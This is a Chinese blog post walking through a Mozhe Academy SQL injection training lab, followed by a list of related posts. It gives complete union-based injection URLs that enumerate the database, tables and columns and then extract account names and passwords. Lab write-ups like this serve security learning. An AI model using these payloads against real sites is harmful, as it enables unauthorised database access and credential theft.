【墨者学院】SQL手动注入 靶场初体验
博主首次浅尝一下SQL注入,一顿操作,然后,啊哈
破解成功!
墨者学院靶场地址
step1: 判断注入
判断是否存在注入,这个靶场肯定存在注入,在参数id后面拼接一些其他变量即可。
step2: 猜解列名数量
order by 关键字日常使用的时候是按照某个列名去排序,即“order by 列名字段”。
order by 后面加上序号,即按照第几列排序,order by 1,按照第一列的字段进行排序。
order by 默认升序,降序关键字DESC,即order by 字段名 DESC;
所以使用order by关键字就能够知道整个表一共有多少个列。
获取列名数量是为了使用union关键字,union关键字是连接两个查询结果,但是前提条件是两个查询结果的字段个数是一样的。所以要先获取字段(列名)个数。
step3:信息收集函数
查看数据库版本:version()
查看数据库名字:database()
查看数据库用户:user()
查看操作系统:@@version_compile_os
http://124.70.64.48:41620/new_list.php?id=2%20union%20select%201,2,3,4
把2,3位置替换成函数version()和database()就能看到数据库的版本和名字。
所以版本5.7.22-0ubuntu0.16.04.1,属于高版本,可以使用information_schema数据库来查询,它存储有数据库名,表名,列名的数据库,可以通过它查询指定数据库下的表名和列名。
关于information_schema的介绍,有个大佬的文章写的非常好!
数据库名字mozhe_Discuz_StormGroup
再看用户和操作系统
http://124.70.64.48:41620/new_list.php?id=2%20union%20select%201,user(),@@version_compile_os,4
information_schema.tables:记录所有表名信息的表
information_schema.columns:记录所有列名信息的表
table_name:表名
column_name:列名
查询语句
http://124.70.64.48:41620/new_list.php?id=2 union select 1,table_name,3,4 from information_schema.tables where table_schema = 'mozhe_Discuz_StormGroup'
http://124.70.64.48:41620/new_list.php?id=2 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema = 'mozhe_Discuz_StormGroup'
# group_concat关键字是为了查到这个mozhe数据库下面所有的表
查询指定表名StormGroup_member下的列名信息
http://124.70.64.48:41620/new_list.php?id=2 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name = 'StormGroup_member'
查询指定数据
http://124.70.64.48:41620/new_list.php?id=2 union select 1,name,password,4 from StormGroup_member
拿到账号和密码
【墨者学院】SQL手动注入 靶场初体验相关推荐
- 墨者学院SQL手工注入靶场漏洞详解
墨者学院SQL手工注入靶场漏洞详解 目录 靶场地址 步骤详解 目录 靶场地址 该靶场由墨者学院安全工程师"墨者"所搭建,靶场环境为Nginx+PHP+MySQL,启动靶场只需1墨币 ...
- Oracle数据库注入-墨者学院(SQL手工注入漏洞测试(Oracle数据库))
本期来为大家讲解的sql注入题目是来墨者学院的SQL手工注入漏洞测试(Oracle数据库). 地址:http://124.70.22.208:42948/new_list.php?id=1(注意地址已 ...
- SQLServer数据库注入-墨者学院(SQL手工注入漏洞测试(Sql Server数据库))
本期来为大家讲解的sql注入题目是来墨者学院的SQL手工注入漏洞测试(Sql Server数据库). 地址:http://219.153.49.228:42295/new_list.asp?id=2( ...
- MongoDB数据库注入-墨者学院(SQL手工注入漏洞测试(MongoDB数据库))
本期来为大家讲解的sql注入题目是来墨者学院的SQL手工注入漏洞测试(MongoDB数据库). 地址:http://124.70.71.251:46804/new_list.php?id=1(注意这里 ...
- 《墨者学院——SQL手工注入漏洞测试(MySQL数据库)》
作者: susususuao 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责. 一:思路 背景介绍 安全工程师"墨者"最近在练习SQL手工注入漏洞,自己刚搭 ...
- 墨者学院-SQL注入漏洞测试(报错盲注)
继续攻克SQL注入类题目啦!!!今天的题目环境提示比较明显,也是比较常见的一种SQL注入漏洞类型,继续储备知识,撸起袖子加油干!!! 附上题目链接:https://www.mozhe.cn/bug/d ...
- 墨者学院-SQL注入漏洞测试(布尔盲注)
决心按部就班.由浅入深地去剖析下sql注入题目提供的靶场环境,完善自身解题思路.本题靶场环境比较简单.也比较常见,没有设置严格的过滤规则,仅仅是限制了页面的回显功能,属于比较初级的sql注入题目.废话 ...
- 墨者学院—SQL过滤字符后手工注入漏洞测试
靶场地址: SQL过滤字符后手工注入漏洞测试(第1题)_SQL注入_在线靶场_墨者学院_专注于网络安全人才培养 关于CTFHUB中的sql注入以及文件上传知识点我们已经学习过一遍了,如果大家都掌握的话 ...
- 渣渣白学习渗透之路(墨者学院sql注入之旅)
渣渣白学习渗透之路 说明:1. 未经授权的渗透测试都是违法的! 2. 文章用红色字体编写的部分是关键部分(认真看)!!! 3. 文章用黑色字体编写的部分是渣渣白内心独白,无关紧0! 4. 文章 ...
最新文章
- 自动检索、修复Python代码bug,微软推出DeepDebug
- 认识下PHP如何使用 phpmailer 发送电子邮件
- Java Web整合开发(85)
- 5、Makefile基础知识汇总(转自陈皓总述)
- Spring Boot 集成 Activiti
- 进程间通信-共享内存实例
- Arthas | 定位线上 Dubbo 线程池满异常
- 【每周CV论文推荐】 人脸识别剩下的难题:从遮挡,年龄,姿态,妆造到亲属关系,人脸攻击...
- xp系统中的隐藏文件不能显示 解决方案
- Linux中的组合键
- error: 'syms' undefined near line 1 column 1
- 计算机网路【2】数据链路层
- Eclipse SVN修改用户名和密码
- 面试常被问的65个问题及回答技巧(请收藏)
- linux 列出指定目录下所有文件的 列表集合
- 脉冲耦合神经网络(PCNN)的python实现
- 【CV-Paper 08】ResNet:Deep Residual Learning for Image Recognition
- liunx命令大全建议粘贴到word文档可方便查询
- ps计算机设置在哪,在哪里设置PS对称渐变工具
- 计算机工程中级职称怎么考,以前中级职称是要考什么计算机-计算机软考中级职称哪个好考...
热门文章
- 微型计算机控制技术 西安交大,西安交通大学18年9月课程考试《计算机控制技术》作业考核试题满分...
- 微信服务商和渠道商区别
- FFmpeg的那些坑-RTP missed xxx packets
- 解决 {ret:100030,msg:this api without user authorization} android QQ第三发登录成功后获取用户信息失败的问题
- 【数据仓库】现代数据仓库坏了吗?
- python 获取值类型用于定义变量_Python中的变量和简单数据类型
- #网站图标、地址栏图标、收藏夹图标、favicon.ico
- java对接阿里云短信服务详解(验证码,推广短信,通知短信)
- Git Failed to connect to github.com port 443: Timed out
- 解决GERRIT MERGE冲突“GIT SUBMIT INCLUDING PARENTS”